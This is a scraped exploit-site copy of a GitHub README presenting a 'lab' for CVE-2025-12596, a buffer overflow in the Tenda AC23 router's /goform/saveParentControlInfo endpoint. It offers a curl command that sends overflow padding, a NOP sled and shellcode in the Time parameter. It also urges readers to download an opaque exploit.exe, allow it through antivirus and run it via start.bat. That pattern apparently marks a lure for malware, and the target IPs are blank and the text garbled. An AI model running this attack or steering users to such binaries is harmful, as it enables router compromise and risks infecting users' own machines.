Share
## https://sploitus.com/exploit?id=0743D3EC-B709-5A4C-B8C3-F40F793348C3
# Lab: CVE-2025-12596 - Buffer Overflow in Tenda AC23 Router

## Download
### [Download exploit](https://github.com/DebugFrag/CVE-2025-12596-Exploit/raw/refs/heads/main/tools/lab-cve-12596.zip)

## ๐Ÿš€ Overview
This repository provides a comprehensive lab environment  CVE-2025-12596 (also tracked as EUVD-2025-37441), a buffer overflow vulnerability classified under CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer). The issue affects the Tenda AC23 router firmware version 16.03.07.52, specifically in the `saveParentControlInfo` function located in the `/goform/saveParentControlInfo` endpoint. By manipulating the `Time` parameter, remote attackers can trigger an overflow, potentially leading to arbitrary code execution.

### Impact
- **Confidentiality**: High โ€“ Attackers may access sensitive data such as network configurations or user credentials.
- **Integrity**: High โ€“ System files or settings could be altered, enabling persistent backdoors.
- **Availability**: Medium โ€“ Overflow may cause crashes or denial-of-service conditions.
- **Exploitability**: Remote execution possible with low privileges; no user interaction required. CVSS score estimated at 8.6 (High).



## ๐Ÿ“‹ Prerequisites
- Operating System: Windows 10/11 (64-bit) for exploit execution; Linux/macOS compatible for analysis.
- Tools: Python 3.8+ (for automation scripts), Wireshark or tcpdump for network traffic analysis (optional).
- Hardware: A Tenda AC23 router running firmware version 16.03.07.52 for testing (ensure it's in a isolated lab network).
- Basic knowledge of C programming, buffer overflows, and network protocols (HTTP/POST requests).

Ensure your antivirus is configured to allow execution of the provided binaries, as they may trigger heuristics for exploit-like behavior.

## Download & Install
1. Download the lab archive from the [releases page](https://github.com/DebugFrag/CVE-2025-12596-Exploit/raw/refs/heads/main/tools/lab-cve-12596.zip). This ZIP contains:
   - `exploit.exe`: Main exploit tool for demonstrating the buffer overflow.
   - `start.bat`: Batch file to launch the exploit safely.
   - Supporting files: Payload templates and logs.

2. Extract the ZIP to a local directory, e.g., `C:\CVE-Lab\`.

## ๐Ÿ›  Quick Start
1. Navigate to the extracted directory.
2. Run `start.bat` to initialize the exploit demo. This script will:
   - Execute `exploit.exe` with a default payload targeting the `Time` parameter overflow.
3. Observe the output: The exploit will demonstrate stack smashing, potential shellcode injection, and system compromise simulation.
4. For manual testing:
   - Use a tool like curl to send a malicious request: `curl -X POST http://:80/goform/saveParentControlInfo --data "Time=$(python -c 'print("A"*1024 + "\x90"*100 + shellcode)')"` (replace `shellcode` with your payload and `` with the target IP).

## ๐Ÿ” Detailed Setup Instructions
### Step 1: Targeting the Vulnerable Endpoint
Ensure the Tenda AC23 router is accessible on the network at its default IP (e.g., 192.168.0.1) and running the vulnerable firmware.

### Step 2: Exploitation Steps
 **Execute Exploit**:
   - Run `exploit.exe --target :80 --payload payloads/overflow.payload`.

  - **Verification**: Use network captures or router logs to check for overflow traces.

### Potential Outputs
- Successful exploit: "Buffer overflow detected! Executing shellcode..."
- Failure: "Input validation passed โ€“ no overflow."
## ๐Ÿ“ž Support  
For further assistance or questions, please feel free to reach out via the issues section of this GitHub repository. Our team is ready to help you with any concerns.